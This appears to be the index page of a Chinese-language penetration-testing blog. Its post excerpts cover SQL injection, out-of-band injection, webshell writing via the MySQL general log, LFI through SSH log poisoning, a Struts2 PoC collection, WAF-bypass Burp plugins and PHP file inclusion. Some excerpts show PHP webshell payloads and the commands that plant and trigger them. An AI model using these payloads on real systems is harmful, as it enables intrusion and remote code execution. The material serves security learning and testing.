ROOTCLAY

Only when you plant the flowers can you really smell their fragrance.

MSSQL注入攻击与防御

总结一下在MSSQL注入中的攻击与防御.

MSSQL注入攻击与防御 author:rootclay@syclover 上一篇投稿在安全客的文章已经为大家推出了MySQL注入攻击与防御,这里再写一下MSSQL注入攻击与防御,同样对与错误的地方希望大家指出共同进步 本文所用数据库涉及SQL Server 2k5,2k8,2k12,其次对于绕过姿势和前文并无太大差别,就不做过多的讲解,主要放在后面的提权上 系统库 库名 解释 ......

MySQL注入攻击与防御

本文主要是做一个Mysql的注入总结,对于Mysql来说利用的方式太过于灵活,这里总结了一些主流的一些姿势,如果有好的姿势可以多加交流.

注入常用函数与字符 下面几点是注入中经常会用到的语句 控制语句操作(select, case, if(), …) 比较操作(=, like, mod(), …) 字符串的猜解操作(mid(), left(), rpad(), …) 字符串生成操作(0x61, hex(), conv()(使用conv([10-36],10,36)可以实现所有字符的表示)) 测试注入 可以用以下语句对一个可......

Out of band injection

Mysql中的带外注入.

这篇文章主要讲关于mysql的带外注入,主要利用的函数为load_file()和select … into outfile/dumpfile还有SMB服务之类的注入 那什么是带外通道注入呢? 带外通道攻击主要是利用其他协议或者渠道从服务器提取数据. 它可能是HTTP(S)请求,DNS解析服务,SMB服务,Mail服务等. 限制 在MySQL中,存在一个称为secure_file_priv......

SQL语句利用日志写shell

前不久刚出的SQL之间利用日志获取SHELL的姿势.

outfile被禁止,或者写入文件被拦截 1234show variables like '%general%'; #查看配置set global general_log = on; #开启general log模式set global general_log_file = '/var/www/html/1.php'; #设置日志目录为shell地址select '<?php......

LFI SSH日志

通过LFI包含到SSH日志来获取SHELL.

LFI SSH日志 1ssh '<?php system($_GET[‘c’]); ?>'@192.168.32.137 1curl http://192.168.32.137/lfi.php?file=/var/log/auth.log&c=ls Tips: 123/var/log/auth.log只有ubuntu系有。其实对linux,可以包含/var/log/wtm......

Docker 三侠客

Docker 三侠客.

少侠:Docker 少侠:有内力修习,有趁手兵器,大多十分年轻便已经成名,侠之标准是【维护江湖道义,名声大振】 最简单的Docker命令教程网上一大堆了这里举几个经常用的就好 安装: sudo apt-get install docker.io 拉取: docker pull ubuntu:16.04 运行: docker run -it ubuntu:16.04 查看: ......

Struts2漏洞

Struts2漏洞POC汇总.

Struts2框架漏洞不断,鉴于struts2使用之广泛,本文汇总Struts2系列漏洞的Poc,给网络管理员或者站长提供查询便利,以便更好的检测自身网站存在的漏洞,也可以让安全从业者更好的了解此漏洞。 struts2-045 1234567891011121314import sysimport requestsdef poc(): C = "%{(#nike='multip......
Web

Burpsuite Plugin+

一些常见的burp插件.

Burpsuite 重要插件 Gason:Burpsuite-sqlmap插件,该插件可以让burp与sqlmap轻松对接,深度发掘SQL注入漏洞. fuzzdb:fuzzing测试数据库,开源,深度测试SQL注入,xss,文件上传/解析等漏洞(结合intruder使用). Fuzzdb bypasswaf:让你轻松绕过waf防御(不要迷信waf). 添加好插件后,在pr......

Bypass WAF --- Burp Plugin

一些常见的burp插件,加上这些插件来绕过一定的WAF.

To use this plugin to add the necessary headers, first you need to either download the Python version of the plugin, the Java version of the plugin, or the Java source and compile yourself. Once y......

FILE INCLUDE

总结几个协议包含.

这里就不多BB了,现在是使用到的文件包含多位协议包含,所以这里总结几个协议包含 php:// php://input 123php://input 是个可以访问请求的原始数据的只读流。 POST 请求的情况下,最好使用 php://input 来代替$HTTP_RAW_POST_DATA,因为它不依赖于特定的 php.ini 指令。 这样的情况下 $HTTP_RAW_POST_DATA ......